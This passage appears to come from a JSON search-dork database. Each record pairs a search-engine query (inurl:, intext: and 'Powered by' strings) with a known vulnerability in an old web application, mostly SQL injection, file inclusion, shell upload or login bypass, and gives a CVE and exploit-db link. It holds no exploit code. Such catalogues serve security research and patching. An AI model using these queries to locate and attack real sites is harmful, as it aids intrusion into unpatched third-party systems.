"Maintained with the Ocean12 Calendar Manager Gold v2.04", "id": 1686}, {"short description": "pagerank-0-topliste.html  OR pagerank-0-tipp.html", "long description": "phpscripts Ranking Script Insecure Cookie Handling Vulnerability - CVE: 2008-6092: http://www.exploit-db.com/exploits/6649", "submited": "2010-11-15", "request": "pagerank-0-topliste.html  OR pagerank-0-tipp.html", "id": 1687}, {"short description": "Copyright 2007 BrowserCRM Ltd", "long description": "BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability - CVE: 2008-2689: http://www.exploit-db.com/exploits/5757", "submited": "2010-11-15", "request": "Copyright 2007 BrowserCRM Ltd", "id": 1688}, {"short description": "Powered by UCenter inurl:shop.php?ac=view", "long description": "UCenter Home 2.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14997", "submited": "2010-11-15", "request": "Powered by UCenter inurl:shop.php?ac=view", "id": 1689}, {"short description": "intext:\"Powered By : Yamamah Version 1.00\"", "long description": "Yamamah 1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13849", "submited": "2010-11-15", "request": "intext:\"Powered By : Yamamah Version 1.00\"", "id": 1690}, {"short description": "\"Sinapis by scripter.ch\"", "long description": "Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability - CVE: 2007-1131: http://www.exploit-db.com/exploits/3367", "submited": "2010-11-15", "request": "\"Sinapis by scripter.ch\"", "id": 1693}, {"short description": "\"Powered by BosClassifieds Classified Ads System\"", "long description": "BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability - CVE: 2008-1838: http://www.exploit-db.com/exploits/5444", "submited": "2010-11-15", "request": "\"Powered by BosClassifieds Classified Ads System\"", "id": 1694}, {"short description": "\"Powered by RGameScript\"", "long description": "RGameScript Pro (page.php id) Remote File Inclusion Vulnerability - CVE: 2007-3980: http://www.exploit-db.com/exploits/4210", "submited": "2010-11-15", "request": "\"Powered by RGameScript\"", "id": 1696}, {"short description": "inurl:\"/files/redirect.asp\"", "long description": "JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload Vulnerability: http://www.exploit-db.com/exploits/10161", "submited": "2010-11-15", "request": "inurl:\"/files/redirect.asp\"", "id": 1698}, {"short description": "\"Easy-Clanpage v2.2\"", "long description": "Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability - CVE: 2008-1425: http://www.exploit-db.com/exploits/5275", "submited": "2010-11-15", "request": "\"Easy-Clanpage v2.2\"", "id": 1700}, {"short description": "inurl:\"/plugins/ImageManager/manager.php\"", "long description": "Wordpress Image Manager Plugins Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10325", "submited": "2010-11-15", "request": "inurl:\"/plugins/ImageManager/manager.php\"", "id": 1702}, {"short description": "\"com_joomlaflashfun\"", "long description": "Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4955: http://www.exploit-db.com/exploits/4415", "submited": "2010-11-15", "request": "\"com_joomlaflashfun\"", "id": 1703}, {"short description": "Powered by BKWorks ProPHP Version 0.50 Beta 1", "long description": "BKWorks ProPHP 0.50b1 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7726", "submited": "2010-11-15", "request": "Powered by BKWorks ProPHP Version 0.50 Beta 1", "id": 1704}, {"short description": "inurl:\"whoiscart/admin/hostinginterfaces/\"", "long description": "WHOISCART Scripting Vulnerability: http://www.exploit-db.com/exploits/10812", "submited": "2010-11-15", "request": "inurl:\"whoiscart/admin/hostinginterfaces/\"", "id": 1705}, {"short description": "Powered by Sisfo Kampus 2006", "long description": "Sisfo Kampus 2006 (blanko.preview.php) Local File Disclosure Vuln - CVE: 2007-4820: http://www.exploit-db.com/exploits/4380", "submited": "2010-11-15", "request": "Powered by Sisfo Kampus 2006", "id": 1706}, {"short description": "inurl:\"sticker/sticker.php?id=\"", "long description": "2Capsule (sticker.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7631", "submited": "2010-11-15", "request": "inurl:\"sticker/sticker.php?id=\"", "id": 1708}, {"short description": "inurl:quizinfo.php", "long description": "PHP-MySQL-Quiz SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10876", "submited": "2010-11-15", "request": "inurl:quizinfo.php", "id": 1709}, {"short description": "\"Powered by Md-Pro\"", "long description": "Md-Pro 1.0.8x (Topics topicid) Remote SQL Injection Vulnerability - CVE: 2007-3938: http://www.exploit-db.com/exploits/4199", "submited": "2010-11-15", "request": "\"Powered by Md-Pro\"", "id": 1710}, {"short description": "inurl:\"index.php?option=com_simpleboard\"", "long description": "Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability - CVE: 2008-1077: http://www.exploit-db.com/exploits/5195", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_simpleboard\"", "id": 1711}, {"short description": "inurl:\"tradeCategory.php?id= \"", "long description": "Hampshire Trading Standards Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12768", "submited": "2010-11-15", "request": "inurl:\"tradeCategory.php?id= \"", "id": 1712}, {"short description": "inurl:\"com_omphotogallery\"", "long description": "Joomla Omilen Photo Gallery 0.5b Local File Inclusion Vulnerability - CVE: 2009-4202: http://www.exploit-db.com/exploits/8870", "submited": "2010-11-15", "request": "inurl:\"com_omphotogallery\"", "id": 1713}, {"short description": "inurl:\"sinagb.php\"", "long description": "Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability - CVE: 2007-1130: http://www.exploit-db.com/exploits/3366", "submited": "2010-11-15", "request": "inurl:\"sinagb.php\"", "id": 1716}, {"short description": "inurl:csc_article_details.php", "long description": "CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability - CVE: 2008-2866: http://www.exploit-db.com/exploits/5865", "submited": "2010-11-15", "request": "inurl:csc_article_details.php", "id": 1717}, {"short description": "inurl:index.php?page=img Powered By Mini File Host", "long description": "Mini File Host 1.x Arbitrary PHP File Upload Vulnerability - CVE: 2008-6785: http://www.exploit-db.com/exploits/7509", "submited": "2010-11-15", "request": "inurl:index.php?page=img Powered By Mini File Host", "id": 1718}, {"short description": "allinurl:com_pccookbook", "long description": "pc_cookbook Mambo Component 0.3 Include Vulnerability - CVE: 2006-3530: http://www.exploit-db.com/exploits/2024", "submited": "2010-11-15", "request": "allinurl:com_pccookbook", "id": 1720}, {"short description": "\"Powered by LDU\"", "long description": "LDU 8.x (polls.php) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/2871", "submited": "2010-11-15", "request": "\"Powered by LDU\"", "id": 1721}, {"short description": "intext:\"powered by tincan ltd\"", "long description": "tincan ltd (section) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11113", "submited": "2010-11-15", "request": "intext:\"powered by tincan ltd\"", "id": 1722}, {"short description": "\"Powered by nzFotolog v0.4.1 2005-2006 Ricardo Amaral\"", "long description": "nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability - CVE: 2008-3405: http://www.exploit-db.com/exploits/6164", "submited": "2010-11-15", "request": "\"Powered by nzFotolog v0.4.1 2005-2006 Ricardo Amaral\"", "id": 1723}, {"short description": "\"REALTOR 747 - Version 4.11\"", "long description": "Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability - CVE: 2009-0495: http://www.exploit-db.com/exploits/7743", "submited": "2010-11-15", "request": "\"REALTOR 747 - Version 4.11\"", "id": 1724}, {"short description": "inurl:\"view_group.php?group_id=\"", "long description": "Vastal I-Tech SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12845", "submited": "2010-11-15", "request": "inurl:\"view_group.php?group_id=\"", "id": 1725}, {"short description": "\"CzarNews v1.12 \" | \"CzarNews v1.13\" | \"CzarNews v1.14 \"", "long description": "CzarNews 1.14 (tpath) Remote File Inclusion Vulnerability - CVE: 2006-3685: http://www.exploit-db.com/exploits/2009", "submited": "2010-11-15", "request": "\"CzarNews v1.12 \" | \"CzarNews v1.13\" | \"CzarNews v1.14 \"", "id": 1726}, {"short description": "inurl:\"filebase.php\" \"Powered by phpBB\"", "long description": "phpBB Mod FileBase (id) Remote SQL Injection Vulnerability - CVE: 2008-1305: http://www.exploit-db.com/exploits/5236", "submited": "2010-11-15", "request": "inurl:\"filebase.php\" \"Powered by phpBB\"", "id": 1728}, {"short description": "allinurl: \"name Sections op viewarticle artid\"", "long description": "PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5154", "submited": "2010-11-15", "request": "allinurl: \"name Sections op viewarticle artid\"", "id": 1729}, {"short description": "\"Powered by samart-cms\"", "long description": "samart-cms 2.0 (contentsid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5862", "submited": "2010-11-15", "request": "\"Powered by samart-cms\"", "id": 1730}, {"short description": "Ultimate-Fun-Book 1.02", "long description": "Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability - CVE: 2007-1059: http://www.exploit-db.com/exploits/3336", "submited": "2010-11-15", "request": "Ultimate-Fun-Book 1.02", "id": 1731}, {"short description": "allinurl: \"modules/dictionary/detail.php?id\"", "long description": "XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability - CVE: 2009-4582: http://www.exploit-db.com/exploits/10807", "submited": "2010-11-15", "request": "allinurl: \"modules/dictionary/detail.php?id\"", "id": 1732}, {"short description": "\"Copyright (C) 2000  Phorum Development Team\"", "long description": "Phorum 3.2.11 (common.php) Remote File Include Vulnerability - CVE: 2006-6550: http://www.exploit-db.com/exploits/2894", "submited": "2010-11-15", "request": "\"Copyright (C) 2000  Phorum Development Team\"", "id": 1733}, {"short description": "inurl:flashblog.html  OR  inurl:/flashblog/", "long description": "FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability - CVE: 2008-2574: http://www.exploit-db.com/exploits/5728", "submited": "2010-11-15", "request": "inurl:flashblog.html  OR  inurl:/flashblog/", "id": 1734}, {"short description": "\"Powered By CMS-BRD\"", "long description": "CMS-BRD (menuclick) Remote SQL Injection Vulnerability - CVE: 2008-2837: http://www.exploit-db.com/exploits/5863", "submited": "2010-11-15", "request": "\"Powered By CMS-BRD\"", "id": 1736}, {"short description": "\"inurl:/admin/\" \"ImageVue\"", "long description": "ImageVue 2.0 Remote Admin Login: http://www.exploit-db.com/exploits/10630", "submited": "2010-11-15", "request": "\"inurl:/admin/\" \"ImageVue\"", "id": 1737}, {"short description": "\"TROforum 0.1\"", "long description": "TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability - CVE: 2007-2937: http://www.exploit-db.com/exploits/3995", "submited": "2010-11-15", "request": "\"TROforum 0.1\"", "id": 1738}, {"short description": "\"Uploader by CeleronDude.\"", "long description": "Uploader by CeleronDude 5.3.0 Shell Upload: http://www.exploit-db.com/exploits/10523", "submited": "2010-11-15", "request": "\"Uploader by CeleronDude.\"", "id": 1739}, {"short description": "\"Review Script\" \"Phil Taylor\"", "long description": "Mambo Component Comments 0.5.8.5g SQL Injection Vulnerability - CVE: 2008-0773: http://www.exploit-db.com/exploits/5094", "submited": "2010-11-15", "request": "\"Review Script\" \"Phil Taylor\"", "id": 1740}, {"short description": "intitle:Mp3 ToolBox 1.0", "long description": "Mp3 ToolBox 1.0 beta 5 (skin_file) Remote File Inclusion Vulnerability - CVE: 2007-6139: http://www.exploit-db.com/exploits/4650", "submited": "2010-11-15", "request": "intitle:Mp3 ToolBox 1.0", "id": 1741}, {"short description": "Powered by: Maian Greetings v2.1", "long description": "Maian Greetings 2.1 Insecure Cookie Handling Vulnerability - CVE: 2008-7086: http://www.exploit-db.com/exploits/6050", "submited": "2010-11-15", "request": "Powered by: Maian Greetings v2.1", "id": 1742}, {"short description": "allinurl: \"com_alberghi\" detail", "long description": "Joomla Component Alberghi 2.1.3 (id) SQL Injection Vulnerability - CVE: 2008-1459: http://www.exploit-db.com/exploits/5278", "submited": "2010-11-15", "request": "allinurl: \"com_alberghi\" detail", "id": 1743}, {"short description": "\"Powered By phpBB Garage 1.2.0\"", "long description": "phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability - CVE: 2007-6223: http://www.exploit-db.com/exploits/4686", "submited": "2010-11-15", "request": "\"Powered By phpBB Garage 1.2.0\"", "id": 1744}, {"short description": "inurl:index.php?option=com_ynews", "long description": "Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-0653: http://www.exploit-db.com/exploits/5072", "submited": "2010-11-15", "request": "inurl:index.php?option=com_ynews", "id": 1746}, {"short description": "\"Powie's PSCRIPT MatchMaker 4.05\"", "long description": "Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability - CVE: 2006-6039: http://www.exploit-db.com/exploits/2798", "submited": "2010-11-15", "request": "\"Powie&#039;s PSCRIPT MatchMaker 4.05\"", "id": 1747}, {"short description": "inurl:etkinlikbak.asp", "long description": "Okul Web Otomasyon Sistemi 4.0.1 Remote SQL Injection Vulnerability - CVE: 2007-0305: http://www.exploit-db.com/exploits/3135", "submited": "2010-11-15", "request": "inurl:etkinlikbak.asp", "id": 1748}, {"short description": "\"Copyright 2008 ImenAfzar ver :2.0.0.0\"", "long description": "Namad (IMenAfzar) 2.0.0.0 Remote File Disclosure Vulnerability: http://www.exploit-db.com/exploits/8734", "submited": "2010-11-15", "request": "\"Copyright 2008 ImenAfzar ver :2.0.0.0\"", "id": 1749}, {"short description": "allinurl:com_comprofiler", "long description": "Joomla Community Builder 1.0.1 Blind SQL Injection Vulnerability - CVE: 2008-2093: http://www.exploit-db.com/exploits/5491", "submited": "2010-11-15", "request": "allinurl:com_comprofiler", "id": 1750}, {"short description": "inurl:\"com_joomlaradiov5\"", "long description": "Joomla Component joomlaradio v5 Remote File Inclusion Vulnerability - CVE: 2007-4923: http://www.exploit-db.com/exploits/4401", "submited": "2010-11-15", "request": "inurl:\"com_joomlaradiov5\"", "id": 1751}, {"short description": "\"powered by phpAdBoard\"", "long description": "phpAdBoard (php uploads) Arbitrary File Upload Vulnerability - CVE: 2008-6921: http://www.exploit-db.com/exploits/7562", "submited": "2010-11-15", "request": "\"powered by phpAdBoard\"", "id": 1752}, {"short description": "\"Powered by Quick.Cms\"", "long description": "Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability - CVE: 2009-1410: http://www.exploit-db.com/exploits/8505", "submited": "2010-11-15", "request": "\"Powered by Quick.Cms\"", "id": 1753}, {"short description": "\"Powered by wpQuiz\" inurl:index.php", "long description": "wpQuiz v2.7 Authentication Bypass Vulnerability - CVE: 2010-3608: http://www.exploit-db.com/exploits/15075", "submited": "2010-11-15", "request": "\"Powered by wpQuiz\" inurl:index.php", "id": 1754}, {"short description": "\"Powered by UCStats version 1.1\"", "long description": "UCStats v1.1 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10891", "submited": "2010-11-15", "request": "\"Powered by UCStats version 1.1\"", "id": 1755}, {"short description": "\"Powered by CCLeague Pro\"", "long description": "CCLeague Pro 1.2 Insecure Cookie Authentication Vulnerability - CVE: 2008-5123: http://www.exploit-db.com/exploits/5888", "submited": "2010-11-15", "request": "\"Powered by CCLeague Pro\"", "id": 1756}, {"short description": "intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie", "long description": "MatPo Bilder Galerie 1.1 Remote File Inclusion Vulnerability - CVE: 2007-6649: http://www.exploit-db.com/exploits/4815", "submited": "2010-11-15", "request": "intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie", "id": 1757}, {"short description": "\"Powered by: PostGuestbook 0.6.1\"", "long description": "PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability - CVE: 2007-1372: http://www.exploit-db.com/exploits/3423", "submited": "2010-11-15", "request": "\"Powered by: PostGuestbook 0.6.1\"", "id": 1758}, {"short description": "\"powered by sunshop\"", "long description": "SunShop Shopping Cart 3.5 (abs_path) RFI Vulnerabilities - CVE: 2007-2070: http://www.exploit-db.com/exploits/3748", "submited": "2010-11-15", "request": "\"powered by sunshop\"", "id": 1759}, {"short description": "\"SQuery 4.5\" |\"SQuery 4.0\" |\"SQuery 3.9\" | inurl:\"modules.php?name=SQuery\"", "long description": "SQuery 4.5 (gore.php) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/2003", "submited": "2010-11-15", "request": "\"SQuery 4.5\" |\"SQuery 4.0\" |\"SQuery 3.9\" | inurl:\"modules.php?name=SQuery\"", "id": 1760}, {"short description": "Powered by SkaDate Dating", "long description": "SkaDate Online 5.0/6.0 Remote File Disclosure Vulnerability - CVE: 2007-5299: http://www.exploit-db.com/exploits/4493", "submited": "2010-11-15", "request": "Powered by SkaDate Dating", "id": 1761}, {"short description": "inurl:\"ibase site:de\"", "long description": "ibase 2.03 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-6288: http://www.exploit-db.com/exploits/6126", "submited": "2010-11-15", "request": "inurl:\"ibase site:de\"", "id": 1762}, {"short description": "\"Powered by sNews\"", "long description": "sNews v1.7 (index.php?category) SQL Injection Vulnerability - CVE: 2010-2926: http://www.exploit-db.com/exploits/14465", "submited": "2010-11-15", "request": "\"Powered by sNews\"", "id": 1763}, {"short description": "\"Powered by Gravy Media\"", "long description": "Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability - CVE: 2009-2184: http://www.exploit-db.com/exploits/8996", "submited": "2010-11-15", "request": "\"Powered by Gravy Media\"", "id": 1764}, {"short description": "inurl:\"index.php?option=com_djiceshoutbox\"", "long description": "Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability: http://www.exploit-db.com/exploits/8197", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_djiceshoutbox\"", "id": 1765}, {"short description": "inurl:com_filiale", "long description": "Joomla Component Filiale 1.0.4 (idFiliale) SQL Injection Vulnerability - CVE: 2008-1935: http://www.exploit-db.com/exploits/5488", "submited": "2010-11-15", "request": "inurl:com_filiale", "id": 1766}, {"short description": "\"Powered By AV Arcade\"", "long description": "AV Arcade 2.1b (index.php id) Remote SQL Injection Vulnerability - CVE: 2007-3563: http://www.exploit-db.com/exploits/4138", "submited": "2010-11-15", "request": "\"Powered By AV Arcade\"", "id": 1767}, {"short description": "Powered by NATTERCHAT v 1.1", "long description": "NatterChat 1.1 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: http://www.exploit-db.com/exploits/7172", "submited": "2010-11-15", "request": "Powered by NATTERCHAT v 1.1", "id": 1768}, {"short description": "ogrencimezunlar.php", "long description": "Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/3012", "submited": "2010-11-15", "request": "ogrencimezunlar.php", "id": 1769}, {"short description": "inurl:index.php?option=com_yanc \"listid\"", "long description": "Joomla Component com_yanc SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11603", "submited": "2010-11-15", "request": "inurl:index.php?option=com_yanc \"listid\"", "id": 1770}, {"short description": "Powered by 6rbScript", "long description": "6rbScript (news.php newsid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5663", "submited": "2010-11-15", "request": "Powered by 6rbScript", "id": 1771}, {"short description": "powered by vpasp v 6.50", "long description": "VP-ASP Shopping Cart 6.50 Database Disclosure Vulnerability - CVE: 2008-5929: http://www.exploit-db.com/exploits/7438", "submited": "2010-11-15", "request": "powered by vpasp v 6.50", "id": 1772}, {"short description": "allinurl:\"/questcms/\"", "long description": "QuestCMS (main.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2137", "submited": "2010-11-15", "request": "allinurl:\"/questcms/\"", "id": 1773}, {"short description": "inurl:com_eQuotes", "long description": "Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability - CVE: 2008-2628: http://www.exploit-db.com/exploits/5723", "submited": "2010-11-15", "request": "inurl:com_eQuotes", "id": 1774}, {"short description": "\"Upload unique IP List:\" AND \"The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK\"", "long description": "Fake Hit Generator 2.2 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10230", "submited": "2010-11-15", "request": "\"Upload unique IP List:\" AND \"The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK\"", "id": 1775}, {"short description": "\"Powered by Xplode CMS\"", "long description": "Xplode CMS (wrap_script) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8373", "submited": "2010-11-15", "request": "\"Powered by Xplode CMS\"", "id": 1776}, {"short description": "Powered by Jewelry Cart Software", "long description": "Jewelry Cart Software (product.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11826", "submited": "2010-11-15", "request": "Powered by Jewelry Cart Software", "id": 1779}, {"short description": "\"Diseo Web Hernest Consulting S.L.\"", "long description": "Administrador de Contenidos Admin Login Bypass vulnerability: http://www.exploit-db.com/exploits/12527", "submited": "2010-11-15", "request": "\"Diseo Web Hernest Consulting S.L.\"", "id": 1780}, {"short description": "inurl:com_cpg", "long description": "Mambo CopperminePhotoGalery Component Remote Include Vulnerability - CVE: 2006-4321: http://www.exploit-db.com/exploits/2196", "submited": "2010-11-15", "request": "inurl:com_cpg", "id": 1783}, {"short description": "inurl:ratelink.php?lnkid=", "long description": "Link Trader (lnkid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10834", "submited": "2010-11-15", "request": "inurl:ratelink.php?lnkid=", "id": 1784}, {"short description": "\"CNStats 2.9\"", "long description": "CNStats 2.9 (who_r.php bj) Remote File Inclusion Vulnerability - CVE: 2007-2086: http://www.exploit-db.com/exploits/3741", "submited": "2010-11-15", "request": "\"CNStats 2.9\"", "id": 1785}, {"short description": "\"Browse with Interactive Map\"", "long description": "PHP Real Estate (fullnews.php id) Remote SQL Injection Vulnerability - CVE: 2007-6462: http://www.exploit-db.com/exploits/4737", "submited": "2010-11-15", "request": "\"Browse with Interactive Map\"", "id": 1786}, {"short description": ": use Your brain (:", "long description": "http://www.exploit-db.com/exploits/5871", "submited": "2010-11-15", "request": "", "id": 1787}, {"short description": "intext:\"Powered By Azaronline.com\"", "long description": "Azaronline Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15391", "submited": "2010-11-15", "request": "intext:\"Powered By Azaronline.com\"", "id": 1789}, {"short description": "Powered by ephpscripts", "long description": "E-Shop Shopping Cart Script (search_results.php) SQL Injection Vuln - CVE: 2008-5838: http://www.exploit-db.com/exploits/6398", "submited": "2010-11-15", "request": "Powered by ephpscripts", "id": 1790}, {"short description": "\"powered by Blog System\"", "long description": "Blog System 1.x (note) SQL Injection Vuln - CVE: 2010-0458: http://www.exploit-db.com/exploits/11216", "submited": "2010-11-15", "request": "\"powered by Blog System\"", "id": 1791}, {"short description": "\"Powered by DWdirectory\"", "long description": "DWdirectory 2.1 Remote SQL Injection Vulnerability - CVE: 2007-6392: http://www.exploit-db.com/exploits/4708", "submited": "2010-11-15", "request": "\"Powered by DWdirectory\"", "id": 1792}, {"short description": "\"2005  www.frank-karau.de\" | \"2006  www.frank-karau.de\"", "long description": "GL-SH Deaf Forum 6.4.4 Local File Inclusion Vulnerabilities - CVE: 2007-3535: http://www.exploit-db.com/exploits/4124", "submited": "2010-11-15", "request": "\"2005  www.frank-karau.de\" | \"2006  www.frank-karau.de\"", "id": 1793}, {"short description": "inurl:jgs_treffen.php", "long description": "Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability - CVE: 2008-1640: http://www.exploit-db.com/exploits/5329", "submited": "2010-11-15", "request": "inurl:jgs_treffen.php", "id": 1796}, {"short description": "\"Powered by SoftbizScripts\" inurl:\"searchresult.php?sbcat_id=\"", "long description": "Softbiz Recipes Portal Script Remote SQL Injection Vulnerability - CVE: 2007-5449: http://www.exploit-db.com/exploits/4527", "submited": "2010-11-15", "request": "\"Powered by SoftbizScripts\" inurl:\"searchresult.php?sbcat_id=\"", "id": 1797}, {"short description": "Powered by SNETWORKS PHP CLASSIFIEDS", "long description": "SNETWORKS PHP CLASSIFIEDS 5.0 Remote File Inclusion Vulnerability - CVE: 2008-0137: http://www.exploit-db.com/exploits/4838", "submited": "2010-11-15", "request": "Powered by SNETWORKS PHP CLASSIFIEDS", "id": 1798}, {"short description": "inurl:Editor/assetmanager/assetmanager.asp", "long description": "Asset Manager Remote File upload Vulnerability: http://www.exploit-db.com/exploits/12693", "submited": "2010-11-15", "request": "inurl:Editor/assetmanager/assetmanager.asp", "id": 1799}, {"short description": "inurl:makaledetay.asp?id=", "long description": "Mayasan Portal v2.0 (makaledetay.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14420", "submited": "2010-11-15", "request": "inurl:makaledetay.asp?id=", "id": 1800}, {"short description": "inurl:\"ir/addlink.php?id=\" OR inurl:\"addlink.php?id=\"", "long description": "list Web (addlink.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10838", "submited": "2010-11-15", "request": "inurl:\"ir/addlink.php?id=\" OR inurl:\"addlink.php?id=\"", "id": 1802}, {"short description": "inurl: Powered by Traidnt UP Version 1.0.", "long description": "Traidnt UP Version 1.0 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/8006", "submited": "2010-11-15", "request": "inurl: Powered by Traidnt UP Version 1.0.", "id": 1803}, {"short description": "inurl:\"com_linkr\"", "long description": "Joomla Component com_linkr - Local File Inclusion: http://www.exploit-db.com/exploits/11756", "submited": "2010-11-15", "request": "inurl:\"com_linkr\"", "id": 1806}, {"short description": "inurl:\"com_janews\"", "long description": "Joomla Component com_janews - Local File Inclusion - CVE: 2010-1219: http://www.exploit-db.com/exploits/11757", "submited": "2010-11-15", "request": "inurl:\"com_janews\"", "id": 1807}, {"short description": "inurl:\"com_sectionex\"", "long description": "Joomla Component com_sectionex - Local File Inclusion: http://www.exploit-db.com/exploits/11759", "submited": "2010-11-15", "request": "inurl:\"com_sectionex\"", "id": 1808}, {"short description": "inurl:\"com_rokdownloads\"", "long description": "Joomla Component com_rokdownloads - Local File Inclusion - CVE: 2010-1056: http://www.exploit-db.com/exploits/11760", "submited": "2010-11-15", "request": "inurl:\"com_rokdownloads\"", "id": 1809}, {"short description": "inurl:\"com_ganalytics\"", "long description": "Joomla Component com_ganalytics - Local File Inclusion: http://www.exploit-db.com/exploits/11758", "submited": "2010-11-15", "request": "inurl:\"com_ganalytics\"", "id": 1810}, {"short description": "inurl:/phpfootball/", "long description": "PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability - CVE: 2007-0638: http://www.exploit-db.com/exploits/3226", "submited": "2010-11-15", "request": "inurl:/phpfootball/", "id": 1811}, {"short description": "\"Search Adult Directory:\"", "long description": "Adult Directory (cat_id) Remote SQL Injection Vulnerability - CVE: 2007-4056: http://www.exploit-db.com/exploits/4238", "submited": "2010-11-15", "request": "\"Search Adult Directory:\"", "id": 1812}, {"short description": "inurl:forum_answer.php?que_id", "long description": "AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14986", "submited": "2010-11-15", "request": "inurl:forum_answer.php?que_id", "id": 1813}, {"short description": "allinurl:index.php?act=publ", "long description": "Qwerty CMS (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8104", "submited": "2010-11-15", "request": "allinurl:index.php?act=publ", "id": 1814}, {"short description": "inurl:\"com_cartweberp\"", "long description": "Joomla Component com_cartweberp LFI Vulnerability - CVE: 2010-0982: http://www.exploit-db.com/exploits/10942", "submited": "2010-11-15", "request": "inurl:\"com_cartweberp\"", "id": 1815}, {"short description": "\"PHPAuction GPL Enhanced V2.51 by AuctionCode.com\"", "long description": "Auction_Software Script Admin Login Bypass vulnerability: http://www.exploit-db.com/exploits/14247", "submited": "2010-11-15", "request": "\"PHPAuction GPL Enhanced V2.51 by AuctionCode.com\"", "id": 1816}, {"short description": "inurl:com_doqment", "long description": "Joomla Component com_doqment (cid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10965", "submited": "2010-11-15", "request": "inurl:com_doqment", "id": 1817}, {"short description": "intext:PHPhotoalbum v0.5", "long description": "PHPhotoalbum 0.5 Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2501: http://www.exploit-db.com/exploits/5683", "submited": "2010-11-15", "request": "intext:PHPhotoalbum v0.5", "id": 1818}, {"short description": "\"Powered by OnePound\"", "long description": "onepound shop 1.x products.php SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9138", "submited": "2010-11-15", "request": "\"Powered by OnePound\"", "id": 1819}, {"short description": "\"Powered By : Yamamah Version 1.00\"", "long description": "Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability - CVE: 2010-2334: http://www.exploit-db.com/exploits/13856", "submited": "2010-11-15", "request": "\"Powered By : Yamamah Version 1.00\"", "id": 1823}, {"short description": "\"powered by SnoGrafx\"", "long description": "SnoGrafx (cat.php?cat) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14523", "submited": "2010-11-15", "request": "\"powered by SnoGrafx\"", "id": 1825}, {"short description": "allinurl:\"xGb.php\"", "long description": "xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability - CVE: 2007-4637: http://www.exploit-db.com/exploits/4336", "submited": "2010-11-15", "request": "allinurl:\"xGb.php\"", "id": 1826}, {"short description": "\"Powered by ForumApp\"", "long description": "ForumApp 3.3 Remote Database Disclosure Vulnerability - CVE: 2008-6147: http://www.exploit-db.com/exploits/7599", "submited": "2010-11-15", "request": "\"Powered by ForumApp\"", "id": 1827}, {"short description": "inurl:/component/jeeventcalendar/", "long description": "Joomla JE Event Calendar LFI Vulnerability: http://www.exploit-db.com/exploits/14062", "submited": "2010-11-15", "request": "inurl:/component/jeeventcalendar/", "id": 1828}, {"short description": "allinurl: page_id album \"photo\"", "long description": "Wordpress Photo album Remote SQL Injection Vulnerability - CVE: 2008-0939: http://www.exploit-db.com/exploits/5135", "submited": 